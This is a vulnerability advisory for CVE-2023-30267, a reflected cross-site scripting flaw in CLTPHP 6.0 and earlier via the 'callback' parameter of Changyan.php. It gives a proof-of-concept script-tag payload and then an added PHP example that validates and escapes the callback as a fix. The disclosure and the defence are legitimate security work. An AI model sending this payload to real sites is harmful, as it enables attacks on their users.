CVE-2023-30267: HuBenVulList/CLTPHP6.0 Reflected cross-site scripting(XSS).md at main · HuBenLab/HuBenVulList
CLTPHP <=6.0 is vulnerable to Cross Site Scripting (XSS) via application/home/controller/Changyan.php.
CLTPHP <= 6.0 Reflected cross-site scripting (XSS)
Description
The system client does not handle GET parameters correctly, resulting in reflected cross-site scripting (XSS).
Vendor Homepage
https://gitee.com/chichu/cltopen/
https://www.cltphp.com/
Author
Proof of Concept
File: application/home/controller/Changyan.php
payload:
?callback=<script>alert(%27Vulnerable%27);</script>
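
One way to handle a `callback` GET parameter safely, assuming the endpoint reflects it into the response as a JSONP-style wrapper (an assumption; the controller source is not shown on this page). This is an added example, not CLTPHP code; `safe_jsonp_callback` and `jsonp_response` are hypothetical names, and it needs PHP 7.3 or later.

```php
<?php
// Added example, not CLTPHP code. Function names are hypothetical.

/**
 * Return the callback name only if it is a plain JavaScript identifier path
 * such as "cb" or "app.handlers.onData"; otherwise return null.
 */
function safe_jsonp_callback(?string $raw): ?string
{
    if ($raw === null || strlen($raw) > 64) {
        return null;
    }
    // Letters, digits, "_" and "$", optionally dotted. No markup, quotes or parentheses.
    $ident = '[A-Za-z_$][A-Za-z0-9_$]*';
    $pattern = '/\A' . $ident . '(?:\.' . $ident . ')*\z/';
    return preg_match($pattern, $raw) === 1 ? $raw : null;
}

/**
 * Build the response headers and body. The raw callback value is never echoed:
 * an invalid or missing callback falls back to plain JSON.
 */
function jsonp_response(array $data, ?string $rawCallback): array
{
    // JSON_HEX_* escapes <, >, &, ' and " so the payload cannot close a script context.
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR;
    $json = json_encode($data, $flags);

    // nosniff stops the browser from reinterpreting the body as HTML.
    $headers = ['X-Content-Type-Options: nosniff'];
    $callback = safe_jsonp_callback($rawCallback);
    if ($callback === null) {
        $headers[] = 'Content-Type: application/json; charset=utf-8';
        return [$headers, $json];
    }
    $headers[] = 'Content-Type: application/javascript; charset=utf-8';
    return [$headers, $callback . '(' . $json . ');'];
}

// Constructed inputs: one valid callback name and the payload from the proof of concept.
foreach (['handleData', "<script>alert('Vulnerable');</script>"] as $cb) {
    [$headers, $body] = jsonp_response(['status' => 'ok'], $cb);
    echo implode("\n", $headers), "\n", $body, "\n\n";
}
```

In a controller, each returned header string would be passed to `header()` before the body is written.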